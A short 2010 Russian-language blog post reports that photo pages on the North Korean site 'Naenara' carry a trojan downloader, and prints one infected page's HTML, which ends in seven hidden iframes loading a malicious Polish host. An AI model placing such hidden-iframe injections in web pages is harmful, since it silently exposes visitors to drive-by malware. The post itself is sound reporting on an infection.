Славные следы самоотвержения народного руководства Интернетом :)
Я уже писал как-то о северокорейском интернете и сайте "Нэнара". Сегодня он явился мне в неожиданном аспекте - "Нэнара" заражена троянами.
Например, вот с этого URL, давшего название заметке, все являющиеся линками фотки товарища Ким Чен Ира определяются как заражённые трояном Trojan-Downloader.JS.Iframe.bes.
Разумеется, в html-файлах содержатся только ссылки на URL, содержащий опасный код. Традиционно для троянов этого класса Trojan-Downloader.JS.Iframe.bes обнаруживает себя по скрытым фреймам <iframe>, вставленным в код файлов *.html. Исходник, в частности, "моего" поражённого файла html выглядит так:
<script> function resize_win(){ resizeTo( img.width + 10, img.height + 200 ); } </script> <body onLoad="resize_win();" LEFTMARGIN="0" RIGHTMARGIN="0" BOTTOMMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0"> <table align="center" cellspacing="0" cellpadding="0" border="0"> <tr> <td align="center"> <IMG id="img"s src="/images/event/2010-02-16/1-0.jpg"> </td> </tr> <tr> <td align="center" style="font-size:15px"> В Металлургическом объединении имени Сентября </td> </tr> </table> <iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe> <iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe> <iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe> <iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe> <iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe> <iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe> <iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe> </body>
Как видим, польские товарищи приютили у себя троян, на который ссылаются заражённые страницы товарищей северокорейских. Кстати, недавно северокорейские товарищи выпустили и правильную социалистическую операционку "Красная звезда".
28.02.2010, 22:30 [9191 просмотр]